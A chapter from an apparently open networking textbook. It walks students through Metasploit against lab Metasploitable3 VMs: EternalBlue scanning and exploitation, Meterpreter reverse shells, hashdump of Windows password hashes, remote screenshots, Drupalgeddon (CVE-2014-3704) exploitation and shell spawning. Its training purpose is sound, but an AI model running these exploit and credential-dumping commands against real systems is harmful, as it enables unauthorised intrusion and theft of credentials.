"

36 Metasploit Console and Meterpreter

Michael Lindemann and Kyle Wheaton

Frameworks can assist penetration testers in a lot of ways. The Metasploit framework hosts a lot of resources and automated scripts to make testing and executing exploits easy and simple.

This lab showcases the process of scanning a target, checking for vulnerabilities, and exploiting the target using the Meterpreter tool. In addition, some other common features of the tool are explained to give readers the opportunity to explore on their own.

Estimated time for completion: 45 minutes

Learning Objectives

  • Learn how to use and find modules in the Metasploit console
  • Learn how to configure and run Metasploit modules
  • Learn how Metasploit scanners work
  • Learn how Meterpreter sessions are managed and operate
  • Become proficient with Meterpreter features

Prerequisites

  • Chapter 42 – Building the Baseline Environment

Deliverables

  • Screenshot of 2 Meterpreter sessions open and their information
  • Screenshot of EternalBlue successful exploitation
  • Screenshot of Drupalgeddon successful exploitation
  • Explain a different Meterpreter feature not covered in the lab

Resources

Contributors and Testers

  • Kyle Wheaton, Cybersecurity Student, ERAU-Prescott

    Phase 1 – The Metasploit Framework

    The Metasploit Framework (msf) is very simple to use and is organized into modules. Each module contains what it is used for, what it will do, and how to execute the module. To understand what each of these modules mean, we have to understand how msf organizes
    its modules.

    MSF aims to organize the modules like folders and files like a file system. There are 3 overall root folders:

    • Exploit – Folder of modules that execute an exploit
    • Auxiliary – Folder containing helper modules (ie. Scanners, exploit tests, etc.)
    • Encoder – Encode data (Not used often)
  1. Exploiting the Auxiliary Folder
    1. Open the msf console

      sudo msfconsole

    2. Search for the auxiliary folder:

      msf6 > search auxiliary

  2. This will show all modules contained within the “auxiliary” folder

NOTE: What do you notice about these modules? How may these modules potentially help you during a penetration test engagement? Do the same for Exploit and Encoder. What do you notice?

Phase 2 – EternalBlue Exploit Scanning with MSF

We will be using the EternalBlue exploit for our demonstration on how to work with the Metasploit Console. Before we execute an exploit, we want to make sure the exploit works, otherwise we may have unintended consequences when executing. Even worse, executing random modules on a host will lead to you getting caught and quickly blocked from the network, ending your engagement.

Let’s use the EternalBlue exploit scanner to check if the metasploitable3 Windows VM is vulnerable!

  1. Open the Metasploit Console

    > sudo msfconsole

  2. Search for `eternalblue`

    msf6 > search eternalblue

    Screenshot of the search for EternalBlue
    Figure 1 – Search for EternalBlue
  3. We see that option 3 is a scanner for the version of SMB that is vulnerable to EternalBlue.

    msf6 > use 3
    msf6 > show options

    1. Showing our options, we see a lot of the information is already filled out.
      Screenshot of the "show options" commnad
      Figure 2 – Options for EternalBlue Scanner

      NOTE: Each of the options contains a description of what the option does and how it changes the properties of the scanner. If the Metasploitable3 Windows machine contained a domain, or we knew a user to search with, we could fill it out. Since it is not a required option, we are going to choose to ignore it.

  4. Set the RHOSTS to the IP of the Metasploitable3 Windows machine.

    msf6 > set RHOSTS 200.200.200.5

    1. This will let the scanner know to target the SMB service at 200.200.200.5. Run the scanner.

      msf6 > run

      Screenshot of a successful scan for EnteralBlue
      Figure 3 – Successful scan for EternalBlue

      NOTE: The scanner has indicated that the SMB server is likely to be vulnerable to EternalBlue, and we are good to attempt to exploit.

Phase 3 – EternalBlue Exploitation

We can see how we have confirmed the exploit is likely to work from our scan and we are ready to attempt to exploit. The previous step reduces our risk of getting caught with useless attempts to break in. Go ahead and exploit!

  1. Search EnternalBlue

    msf6 > search eternalblue
    msf6 > use 0

    Screenshot of searching for enteral blue
    Figure 4 – Searching for EternalBlue after initial scan
  2. Show the options. You will notice the page has a lot more options within the module.
    Screenshot of showing the options for the EternalBlue Exploit Module
    Figure 5 – Options for EternalBlue Exploit Module

    NOTE: We can see the usual module options at the top containing similar options as our scanner. Below we have a payload option. This defines the behavior of module of what it does after gaining remote code execution. Currently, we are using the generic meterpreter reverse TCP shell. After execution, it will bring us into a meterpreter session, a type of shell with lots of tools built-in from the Metasploit framework

  3. We can find different payloads by using the search feature or looking at Rapid7’s website of their listed payloads in Metasploit (Resource #2)
    Screenshot of Rapid 7's list of exploits
    Figure 6 – Screenshot of Available Payloads in Metasploit Console from Rapid7
  4. Test out different payloads with EternalBlue by setting the payload:

    msf6 > set payload [payload path]

    NOTE: In the following example, we will use the default meterpreter payload.

  5. Use the default payload
    1. Ensure you set your options before executing the EternalBlue exploit module
    2. Execute your payload. Use the run command
      Screenshot of a successful execution of the EternalBlue module
      Figure 7 – Successful Execution of EternalBlue Exploit Module
    3. We now have been dropped into a meterpreter shell. You can execute regular PowerShell commands like in a regular PowerShell terminal.
    4. To see the features of the meterpreter shell and what it offers, use the command below

      meterpreter > help

    5. This will show all the built-in utilities of the meterpreter shell.

Phase 4 – EternalBlue Post Exploitation

Looking at a few meterpreter features, let’s highlight a few important post exploitation steps

  • First, `hashdump` is a command that will dump the hashes of the Windows users to the shell’s standard output.
  • Second
  1. Use meterpreter features
    1. Hashdump is a command that will dump the hashes of the Windows users to the shell’s standard output. Use it in the meterpreter shell

      meterpreter > hashdump

      Screenshot of the hashdump command's output
      Figure 8 – Screenshot of Dumped Hashes from Metasploitable3 Windows
    2. Using the screenshot command of meterpreter, we can view what is happening on the Metasploitable3 server

      meterpreter > screenshot

      NOTE: This will put the screenshot in the home directory of the user we are logged in as in Kali.

      Screenshot of the steps using the "screenshot" command that is being put onto the Kali Machine's desktop
      Figure 9 – Screenshot of Metasploitable3 Machine’s Desktop
    3. Look through the features of meterpreter and play around with them. Play the victim and see what the attacker is able to see.
    4. Background the meterpreter session by typing background. This will keep the session alive while we exploit the Linux machine. Remember that the Windows session is session 1!

      msf6 > background

 

Phase 5 – Drupal Exploitation

This next exercise will take advantage of another RCE located in Drupal, an HTTP framework for content management (CVE-2014-3704)

  1. Use the Drupalgeddon exploit module using the steps defined in the previous phases

    msf6 > search drupal
    msf6 > use 2
    msf6 > options

    Screenshot of the Drupalgeddon Exploit Module Options
    Figure 10 – Drupalgeddon Exploit Module Options
  2. Use the info command in the Metasploit Console to review how the exploit works and the details of the CVE

    msf6 > info

    Screenshot of Drupalgeddon Exploit Module Information
    Figure 11 – Drupalgeddon Exploit Module Information

    NOTE: This information is extremely useful. Not only does it describe what the module is doing, but also what targets are available for the module. You can change the targets similar to changing RHOST as we did before

  3. The following options must be set against the Metasploitable3 Linux machine from the network map
    1. Use the recommended target 0

      msf6 > set RHOST 200.200.200.6
      msf6 > set TARGETURI /drupal/

  4. Execute the exploit module

    msf6 > exploit

    1. A new meterpreter session has been opened. This meterpreter session should appear as session 2 since session 1 is still open with the Metasploitable3 Windows machine.
      Screenshot of the second Meterpreter Session opened with Drupalgeddon Exploit Module
      Figure 12 – Second Meterpreter Session Opened with Drupalgeddon Exploit Module
  5. Background the session

    msf6 > background

    Screenshot of the user putting session 2 in the background using the "background" command
    Figure 13 – Meterpreter Session 2 Backgrounded

Phase 6 – Meterpreter Session Management

Within Metasploit, meterpreter can hold multiple sessions at once. Switching between machines you have gained access to can be important when comparing information, staging exploits, and deploying malware. This phase will explain how to handle multiple
meterpreter sessions.

  1. View all active sessions by using the sessions command

    msf6 > sessions

    Screenshot of the "sessions" command output
    Figure 14 – Output of Sessions Command
  2. Switch back to the Metasploitable3 Windows session
    1. In order to switch between sessions, the same session command can be used with the session number

      msf6 > sessions 1

       

      Screenshot of switching back to Session 1
      Figure 15 – Switch Back to Session 1
    2. To get back to the Metasploit console, use the same command as before to background the session.
    3. Now that we can switch between the sessions, we can compare how meterpreter has different modules depending on what operating system the shell is loaded on.
    4. There are a lot of reasons you may not want to be using the meterpreter session directly. Luckily, you can easily switch to a normal shell.
  3. By using the execute module, you will be able to execute commands as like you were in a shell.

    msf6 > sessions 2
    meterpreter > execute -f /bin/bash -i

    Screenshot of the Meterpreter session converted to a bin-bash shell.
    Figure 16 – Meterpreter session converted to a bin-bash shell.

    NOTE: The same thing can be done in the Windows machine if you specify the cmd.exe path or
    powershell.exe

    1. To close a meterpreter session, enter the session and use exit to close the connection.
      Screenshot of closing Meterpreter Session 1
      Figure 17 – Closing Meterpreter Session 1.

      NOTE: There are a lot more meterpreter features. Use help or ? to find out more. Metasploit can be a very powerful tool once you learn its core features.

       

 

 

 

License

Icon for the Creative Commons Attribution-NonCommercial 4.0 International License

Mastering Enterprise Networks 2e Copyright © 2024 by Mathew J. Heath Van Horn is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License, except where otherwise noted.

Share This Book